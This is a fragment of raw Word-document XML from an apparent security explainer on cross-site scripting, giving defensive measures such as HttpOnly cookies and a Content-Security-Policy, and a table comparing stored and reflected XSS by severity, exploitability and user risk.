    <w:p w14:paraId="022D0D9B" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set session cookies as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Secure, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> so </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> theft via XSS is not possible even if a payload executes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156F99F9" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Deploy a Content-Security-Policy restricting script sources as defense in depth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7572B4CE" w14:textId="77777777" w:rsidR="00CD1729" w:rsidRDefault="007A6B42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Review/moderate stored content in high-risk fields (comments, profiles) and monitor for injected script patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8F4164" w14:textId="19B0FAA9" w:rsidR="00CD1729" w:rsidRDefault="00C61E2E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="007A6B42">
        <w:t>. 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29"/>
        <w:gridCol w:w="2518"/>
        <w:gridCol w:w="2518"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CA693D" w14:paraId="6B88A62B" w14:textId="77777777" w:rsidTr="00CA693D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6919FD35" w14:textId="4A0CA5F5" w:rsidR="00CA693D" w:rsidRDefault="00CA693D">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>Attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3329" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2513BC43" w14:textId="2C776CA6" w:rsidR="00CA693D" w:rsidRDefault="00CA693D">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="012A204C" w14:textId="132BB52C" w:rsidR="00CA693D" w:rsidRDefault="00CA693D">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>Reflected XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4825C1CD" w14:textId="77777777" w:rsidR="00CA693D" w:rsidRDefault="00CA693D">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA693D" w14:paraId="2AFF70E7" w14:textId="77777777" w:rsidTr="00CA693D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="745BBCF9" w14:textId="1D9BE2E7" w:rsidR="00CA693D" w:rsidRDefault="00CA693D">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3329" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E6D984F" w14:textId="134EAAB0" w:rsidR="00CA693D" w:rsidRDefault="00CA693D">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>Server is safe, but all users are not</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D7918A4" w14:textId="62DE51BD" w:rsidR="00CA693D" w:rsidRDefault="004D7040">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>Needs user to click a link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39B334DA" w14:textId="77777777" w:rsidR="00CA693D" w:rsidRDefault="00CA693D">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA693D" w14:paraId="1C051F63" w14:textId="77777777" w:rsidTr="00CA693D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="249B225D" w14:textId="0616AFB2" w:rsidR="00CA693D" w:rsidRDefault="00CA693D">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>Exploitability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3329" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E821875" w14:textId="70A734DF" w:rsidR="00CA693D" w:rsidRDefault="00CA693D">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>Just need to post &lt;script&gt; in a comment box</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FF13612" w14:textId="5979E470" w:rsidR="00CA693D" w:rsidRDefault="004D7040">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>Needs phishing/social engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33B403DE" w14:textId="77777777" w:rsidR="00CA693D" w:rsidRDefault="00CA693D">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA693D" w14:paraId="4B980C33" w14:textId="77777777" w:rsidTr="00CA693D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1705" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B91D43D" w14:textId="3FF2513A" w:rsidR="00CA693D" w:rsidRDefault="00CA693D">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>Risk to User</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3329" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7487CF45" w14:textId="77532A17" w:rsidR="00CA693D" w:rsidRDefault="004D7040">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>Cookies stolen, sessions hijacked, users redirected to fake login to steal bank info. User trusts your site, but you deliver the attack.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1927833A" w14:textId="08CCD5AB" w:rsidR="00CA693D" w:rsidRDefault="004D7040">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
            <w:r>
              <w:t>1 click = account stolen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BE216F9" w14:textId="77777777" w:rsidR="00CA693D" w:rsidRDefault="00CA693D">
            <w:pPr>
              <w:spacing w:after="160"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2ECC6B3A" w14:textId="4234C611" w:rsidR="00CD1729" w:rsidRDefault="00CD1729">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CD17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AC7E2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E600449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729"/>
    <w:rsid w:val="00214D67"/>
    <w:rsid w:val="004D7040"/>
    <w:rsid w:val="007A6B42"/>
    <w:rsid w:val="00901CAB"/>
    <w:rsid w:val="00C61E2E"/>
    <w:rsid w:val="00CA693D"/>
    <w:rsid w:val="00CD1729"/>
    <w:rsid w:val="00D51B1C"/>
    <w:rsid w:val="00EF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E03A"/>
  <w15:docId w15:val="{934570E2-FB06-4A6B-AD1E-A6F8EB7E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A69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#KPN</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-16T11:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-16T22:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>